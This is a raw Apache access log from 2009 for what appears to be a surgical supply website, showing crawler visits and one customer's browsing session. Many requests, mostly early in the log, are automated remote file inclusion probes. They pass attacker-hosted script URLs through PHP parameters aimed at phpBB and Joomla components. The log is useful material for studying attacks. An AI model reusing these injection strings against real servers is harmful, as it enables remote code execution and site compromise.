74.6.17.151 - - [19/Jun/2009:00:03:20 -0400] "GET /logs/error_log.Q109041300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.44.103 - - [19/Jun/2009:00:03:39 -0400] "GET /logs/access_log.Q107083000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
124.138.156.3 - - [19/Jun/2009:00:03:46 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:00:03:46 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:00:03:46 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:54 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:03:55 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.71.14 - - [19/Jun/2009:00:05:39 -0400] "GET /images/connect_anim.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
218.106.254.18 - - [19/Jun/2009:00:05:54 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:05:55 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:04 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:04 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.138.156.3 - - [19/Jun/2009:00:06:15 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:22 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:22 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:22 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:26 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
38.99.44.103 - - [19/Jun/2009:00:06:28 -0400] "GET /logs/access_log.Q107062900 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
218.106.254.18 - - [19/Jun/2009:00:06:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:30 -0400] "GET /logs/access_log.Q109060900%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 200 6108 "-" "Mozilla/5.0"
218.106.254.18 - - [19/Jun/2009:00:06:31 -0400] "GET /logs/access_log.Q109051600%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.enterprisenetwork.ie/mambots/idxx.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:00:06:52 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:00:06:52 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:00:06:52 -0400] "GET /logs/access_log.Q109060600//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.11.230.36 - - [19/Jun/2009:00:08:01 -0400] "GET /logs/access_log.Q109051200//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.125.146.130 - - [19/Jun/2009:00:08:01 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:08:01 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:08:01 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:08:01 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:08:02 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:08:02 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
38.99.44.103 - - [19/Jun/2009:00:08:49 -0400] "GET /logs/error_log.Q108012200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.125.146.130 - - [19/Jun/2009:00:09:55 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:09:55 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
87.106.76.218 - - [19/Jun/2009:00:10:17 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
87.106.76.218 - - [19/Jun/2009:00:10:17 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
87.106.76.218 - - [19/Jun/2009:00:10:17 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
38.99.44.103 - - [19/Jun/2009:00:11:07 -0400] "GET /images/_notes/contact_fax_over.jpg.mno HTTP/1.0" 200 250 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
75.125.146.130 - - [19/Jun/2009:00:11:11 -0400] "GET /logs/access_log.Q109050800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
75.125.146.130 - - [19/Jun/2009:00:11:13 -0400] "GET /logs/access_log.Q109050800/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/Jun/2009:00:12:40 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.76.218 - - [19/Jun/2009:00:12:48 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.postcon.de/404.txt??? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
66.249.71.54 - - [19/Jun/2009:00:13:05 -0400] "GET /images/over-index9_syring.jpg HTTP/1.1" 200 1681 "-" "Googlebot-Image/1.0"
66.249.71.14 - - [19/Jun/2009:00:14:03 -0400] "GET /images/over-index6_halfsheets.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
66.249.71.14 - - [19/Jun/2009:00:14:09 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0048644B1D22B100301E04S+WSEQ(S0060):1+OUITEM(A0200):04942004 HTTP/1.1" 200 27021 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
71.180.219.239 - - [19/Jun/2009:00:15:00 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:01 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:02 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN HTTP/1.1" 200 37788 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:03 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:04 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:12 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L009A724489923200FA3F04U+M37+ENG HTTP/1.1" 200 38315 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):SMNSIGN" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:15 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009A724489923200FA3F04U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L009A724D88429200F7BF04U+M37+ENG HTTP/1.1" 200 36149 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:18 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009A724D88429200F7BF04U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
71.180.219.239 - - [19/Jun/2009:00:15:18 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L009A724D88429200F7BF04U+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
